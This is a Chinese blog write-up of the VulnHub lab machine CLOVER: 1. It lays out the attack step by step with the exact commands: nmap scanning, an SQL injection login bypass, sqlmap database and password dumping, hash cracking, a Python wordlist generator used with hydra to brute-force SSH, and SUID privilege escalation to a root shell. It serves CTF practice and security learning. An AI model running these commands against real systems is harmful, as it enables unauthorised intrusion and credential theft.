CLOVER: 1

最新推荐文章于 2023-10-09 22:34:29 发布

183****1694

最新推荐文章于 2023-10-09 22:34:29 发布

阅读量321

点赞数

原文链接：https://www.wangguixiu.top/vulnhub%E9%9D%B6%E5%9C%BA/CLOVER-1.html

版权

CLOVER: 1

作者: admin
时间: 2021-06-08
分类: vulnhub靶场

1.主机发现，fping -g 192.168.137.0/24 | grep alive > /tmp/fpinged
2.端口扫描，nmap -A -p 1-65535 -v 192.168.137.222
3.ftp开启了匿名登录，get三个文件，但是没用上
4.web目录扫描到website，html源码中得知"CMS ColdFusion"
网上没找到cms漏洞，但找到了后台"/CFIDE/Administrator/"，在login.php处登录界面

万能密码"uname=admina&pswd=' or '1'='1"成功登录，但是只返回了"Logged in"，不过这已经说明有漏洞了，接着脱库就可以了

用sqlmap跑，sqlmap -u "http://192.168.137.222/CFIDE/Administrator/login.php" --data="uname=a&pswd=1" --dbs

available databases [5]:
[*] clover
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

判断是否是dba，sqlmap -u "http://192.168.137.222/CFIDE/Administrator/login.php" --data="uname=a&pswd=1" --is-dba，返回"current user is DBA: True"

sqlmap写入文件失败，也找不到网站目录

获取dba密码，sqlmap -u "http://192.168.137.222/CFIDE/Administrator/login.php" --data="uname=a&pswd=1" --passwords，也可以手动来，在mysql库-user表-authentication_string字段
"https://www.somd5.com/"，在这个网站得到明文密码"astaasta"，在"/phpmyadmin"登录(目录扫描出来的)，"clover"库里还有三个md5，但是解不开，搜索phpmyadmin版本漏洞找到"CVE-2014-8959"，不过利用不了，数据库里也没找到网站实际目录

实在做不出来去网上找答案("https://www.youtube.com/watch?v=VdTxvbz7Ss0")，clover库-users表中asta用户密码能解开？(视频里解出"asta$$123"，网上排名靠前的md5 decrypt网站都试了下，还是没解开，视频中给的网站用不了。自己字典不行，这个也不好跑出来，无语)

"ssh asta@192.168.137.222"，几种提权方式都没成功，又到了信息收集时间了。最终在"/var/backups/reminder/passwd.word"中找到部分"sword"用户的部分密码
写个脚本生成字典，用"hydra"跑，脚本内容:

with open("1.txt", 'w') as fp:
    for i in range(1,10000):
         fp.write("P4SsW0rD%04d\n" %i)

使用"hydra -l sword -P /tmp/1.txt ssh://192.168.137.222"跑密码，跑出密码"P4SsW0rD4286"，字典可以改到4000到5000之间，不然会跑很久
切换到sword用户，用"find / -perm -u=s -type f 2>/dev/null"找到"deamon.sh"

使用 ./deamon.sh -e 'os.execute("/bin/sh")' 提权

标签: none